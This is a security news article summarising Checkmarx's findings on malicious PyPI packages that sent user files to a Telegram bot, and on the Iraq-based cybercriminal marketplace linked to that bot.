In Iraq, a vast criminal network has surfaced, connected to a Telegram bot dating back to 2022 that has amassed over 90,000 messages predominantly written in Arabic. Researchers at Checkmarx have uncovered that this bot serves as the linchpin to a sophisticated cybercriminal ecosystem, encompassing an underground marketplace that offers services for social media manipulation and tools for financial theft, along with a collection of malicious PyPI packages that extract user data.
Recently, a set of malicious Python packages in Arabic materialized on PyPI, the Python code repository, uploaded by a user under the alias “dsfsdfds.” Upon closer examination by the Checkmarx team, it was revealed that these packages harbored a malicious script designed to siphon sensitive user data to a Telegram bot chat.
“The malicious script kicks off by scanning the user’s file system, with a specific focus on two key locations: the root folder and the DCIM folder,” stated the report released by Checkmarx. “Throughout this scanning process, the script hunts for files with extensions such as .py, .php, and .zip, in addition to photos with .png, .jpg, and .jpeg extensions.”
Furthermore, the packages were found to include a hardcoded Telegram ID and token, which enabled Checkmarx researchers to gain direct access to the attacker’s Telegram bot. Their investigation unveiled a substantial history of activity within the bot, dating back to at least 2022, predating the release of the malicious packages on PyPI.
The extensive archive of 90,000 messages points to Iraq as the source of this criminal operation, intertwined with numerous other bots. The evidence indicates that Iraq harbors an undisclosed, thriving cybercriminal network that provides a range of illegal services.
“The exposure of the nefarious Python packages on PyPI and the subsequent probe into the Telegram bot have illuminated a sophisticated and widespread cybercriminal endeavor,” concluded the report. “What initially seemed to be an isolated occurrence of malicious packages turned out to be merely the tip of the iceberg, unveiling a well-established criminal ecosystem based in Iraq.”
This revelation emphasizes the continuing role of open-source software in presenting an avenue for compromising enterprise data security, as highlighted by the researchers. They expressed intentions to disclose further details regarding the underground activities in Iraq in the forthcoming months.
“As the battle against malicious actors in the open-source realm persists, cooperation and sharing of information among the security community will be vital in identifying and thwarting these attacks,” emphasized the researchers. “Through collective efforts and proactive measures, we can strive towards a safer and more secure open-source environment for all.”
This discovery sheds light on the growing sophistication and reach of cybercriminal operations, underscoring the need for vigilance and collaboration within the security community to combat such threats effectively.